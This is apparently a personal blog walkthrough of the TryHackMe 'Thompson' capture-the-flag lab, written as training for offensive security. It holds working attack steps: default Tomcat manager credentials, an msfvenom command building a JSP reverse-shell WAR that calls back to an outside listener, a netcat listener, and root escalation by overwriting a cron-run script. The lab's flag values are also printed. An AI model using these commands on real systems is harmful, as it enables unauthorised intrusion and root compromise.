TryHackMe Walkthrough | Thompson

Aditya Kumar
4 min readJun 24, 2021

--

boot2root machine for FIT and bsides guatemala CTF you can access it from here.

This walkthrough is written as a part of Master’s certificate in cybersecurity (Red Team) that I am pursuing from HackeU.

Firstly we have to make a connection with VPN or use the attack box on the Tryhackme site to connect to the Tryhackme lab environment.

Now we will deploy the machine after that we will get the Target system IP.

Reconnaissance

Starting with a regular nmap scan

nmap -sS -sC -sV 10.10.53.69

-sS (TCP SYN scan)

-sV (Version detection)

From scan we can see that 3 ports are open which are port 22,port 8080 and port 8009.

Since, port 8080/http is open, we will check in web server

We have opened the web server using the 8080 port, we got some information about tomcat

After some digging when i cliked on the Manage App button it showed me a login dialog box.

As I was not sure of the credentials, I clicked on the cancel button, it directs to the page, which has the credentials of tomcat ,manager.

Username :- tomcat

Password :- s3cret

Login to the tomcat manager application with the credentials.

After login, we see the admin dashboard for the website.

It also has an upload option with only for .war files. I searched a little about what is war file and its details we came to know that it is java related file.

So I used msfvenom to create a reverse shell payload with a .war extension

After uploading the file we see it on the webpage and when we click it , it gives a reverse connection to our netcat listener.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=4444 -f war > shell.war

As seen we will select java/jsp_shell_reverse_tcp payload and will create a payload warfile to get reverse shell.

Now before clicking on the file we have to start netcat to listen and to get reverse shell.

nc -nlvp 4444

We got the shell. Now Its time to find the flags.

Finding Flags

Found the first flag in the/home/jack directory

Note :- Spawning a interactive shell is a must.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Flag :- 39400c90bc683a41a8935e4719f181

Privilege escalation

We also see an id.sh & test.txt file and after some digging, I found out that a cronjob is associated with id.sh which executes the command in the file every minute.

cat /etc/crontab

using this to escalate our privileges.

As the .sh file will run after every 1 minute we can write our command in it and just get our command executed.

echo “cp /root/root.txt /home/jack/root.txt” > id.sh

After one minute we have our command executed successfully.

Root Flag

Root Flag :- d89d5391984c0450a95497153ae7ca3a

The Room is completed. Do leave some claps if this helped you in any way.

--

--

Aditya Kumar
Aditya Kumar

Written by Aditya Kumar

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.